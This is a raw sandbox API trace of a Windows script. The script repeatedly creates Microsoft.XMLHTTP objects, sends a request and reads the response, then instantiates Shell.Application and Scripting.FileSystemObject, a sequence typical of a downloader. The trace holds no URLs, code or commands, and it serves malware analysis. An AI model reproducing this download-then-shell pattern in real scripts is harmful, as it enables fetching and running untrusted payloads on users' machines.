	[0445.021] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0445.021] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0445.021] ??2@YAPEAX_K@Z () returned 0x62f310
	[0445.021] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f310) 
	[0445.021] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.021] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0445.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0445.021] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0445.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.022] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.022] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.022] SysStringLen (param_1=0x0) returned 0x0
	[0445.022] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0445.022] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0445.022] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0445.022] ??2@YAPEAX_K@Z () returned 0x62f330
	[0445.022] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.022] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0445.022] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0445.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.023] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.023] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.023] SysStringLen (param_1=0x0) returned 0x0
	[0445.023] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0445.023] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0445.023] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0445.023] ??2@YAPEAX_K@Z () returned 0x62f310
	[0445.023] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.023] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0445.023] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0445.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.024] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.024] longjmp () 
	[0445.024] longjmp () 
	[0445.024] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.024] SysStringLen (param_1=0x0) returned 0x0
	[0445.024] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0445.024] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0445.024] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0445.024] ??2@YAPEAX_K@Z () returned 0x62f330
	[0445.024] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0445.024] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.024] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0445.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0445.025] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0445.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.025] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.025] longjmp () 
	[0445.025] longjmp () 
	[0445.025] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0445.025] SysStringLen (param_1=0x0) returned 0x0
	[0445.025] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0445.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0445.026] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0445.026] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0445.026] ??2@YAPEAX_K@Z () returned 0x62f310
	[0445.026] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0445.026] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0445.026] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.026] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0445.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0445.026] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0445.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0446.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0446.931] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0446.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0446.932] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0446.932] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0446.932] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0446.932] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0446.932] SysStringLen (param_1=0x0) returned 0x0
	[0446.932] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0446.932] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0446.932] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0446.932] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0446.932] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0446.932] ??2@YAPEAX_K@Z () returned 0x62f350
	[0446.932] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0446.932] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0446.932] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0446.932] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0446.933] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0446.933] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0446.933] SysStringLen (param_1=0x0) returned 0x0
